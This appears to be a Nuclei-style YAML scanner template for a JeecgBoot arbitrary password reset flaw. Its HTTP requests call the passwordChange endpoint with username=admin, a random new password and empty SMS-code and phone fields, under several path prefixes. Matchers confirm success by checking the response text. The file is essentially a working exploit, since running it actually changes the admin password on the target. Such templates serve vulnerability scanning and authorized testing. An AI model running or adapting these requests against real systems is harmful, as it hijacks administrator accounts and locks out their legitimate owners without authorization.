id: jeecg-boot-passwordChange-Password-Reset

info:
  name: JeecgBoot passwordChange 任意用户密码重置漏洞
  author: pwd
  severity: high
  tags: Password Reset


variables:
  password: "{{to_lower(rand_base(6))}}" # 生成6位随机字符串作为新密码

http:
  # - raw:
  #     - |
  #       GET /jeecg-boot/sys/user/passwordChange?username=admin&password={{password}}&smscode=&phone= HTTP/1.1
  #       Host: {{Hostname}}
  #       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
  #       Accept: */*
  #       Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  #       Accept-Encoding: gzip, deflate, br
  #       Connection: keep-alive

  #   matchers:
  #     - type: dsl
  #       dsl:
  #         - 'status_code == 200'
  #         - 'contains(body, "密码修改完成！")'
  #         - 'contains(body, "\"success\":true")'
  #       condition: and

  - raw:
      - |
        GET /sys/user/passwordChange?username=admin&password={{password}}&smscode=&phone= HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate, br
        Connection: keep-alive

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "密码修改完成！")'
          - 'contains(body, "\"success\":true")'
        condition: and

  - raw:
      - |
        GET /novat-boot/sys/user/passwordChange?username=admin&password={{password}}&smscode=&phone= HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate, br
        Connection: keep-alive

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "password reset successfully")'
          - 'contains(body, "success")'
        condition: and
